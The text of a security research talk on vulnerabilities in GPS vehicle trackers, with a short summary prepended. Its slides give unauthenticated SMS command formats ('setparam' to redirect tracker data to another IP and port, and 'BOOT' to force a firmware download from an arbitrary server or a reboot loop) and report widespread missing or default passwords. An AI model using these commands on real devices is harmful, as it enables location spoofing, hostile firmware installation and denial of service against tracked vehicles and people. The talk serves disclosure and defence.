The document discusses security vulnerabilities in vehicle tracking devices, including: 1. Fake base transceiver stations could intercept GSM communications and spoof the device's location. 2. GPS jamming could interfere with location tracking. 3. Server-side vulnerabilities like those in the OWASP top 10 could allow unauthorized access. 4. Devices can be reconfigured or have their firmware updated remotely via SMS or GPRS without authentication, allowing man-in-the-middle attacks or denial of service.

1. Where is my car, dude?!
Dmitry Chastuhin
Gleb Cherbov

2. About
Dmitry chipik
Chastuhin
Yet another security researcher
@_chipik

3. About
Gleb Cherbov
• Digital security
• Defcon Russia 7812
@cherboff

6. So what?
GSM channel
Fake BTS
GPS Jammers
Server side
?
Device

7. Tracker

8. Attack. Inf disclosure

9. Attack. XSS

10. Attack. SQLinj

11. PROFIT?
All your cars
prisoners
children
are belong to us…

12. Too simple…

13. So what?
GSM channel
Fake BTS
GPS Jammers
Server side OWASP top 9000
Device ?

14. GPS ant.
Mic/speaker
GPS
GSM/GPRS SIM ARM
RS-232 Power/peripheral

15. How to interact with?
RS-232 – configuration,
firmware update
SMS – configuration,
data exchange
GPRS – data exchange,
configuration,
firmware update
Voice call – just for voice calling =)

16. SMS configuration require authentication…
…but who use it?

17. …In numbers
43
11
22
secure no password "123" like login/pass

18. MiTM
setparam 3245 <IP>
setparam 3246 <Port>
change any sent parameter:
• coordinates
• speed
• fuel level

19. DEMO

20. Firmware update through SMS
• Just sent SMS:
BOOT <IMEI> <APN setting> <ip:port> <filename>
…and device try to load ip:portfilename and
update own firmware
Without any authentication!

21. DoS through SMS
• Just sent SMS:
BOOT <IMEI>
…and device will be reboot in infinity updater
loop

22. Questions?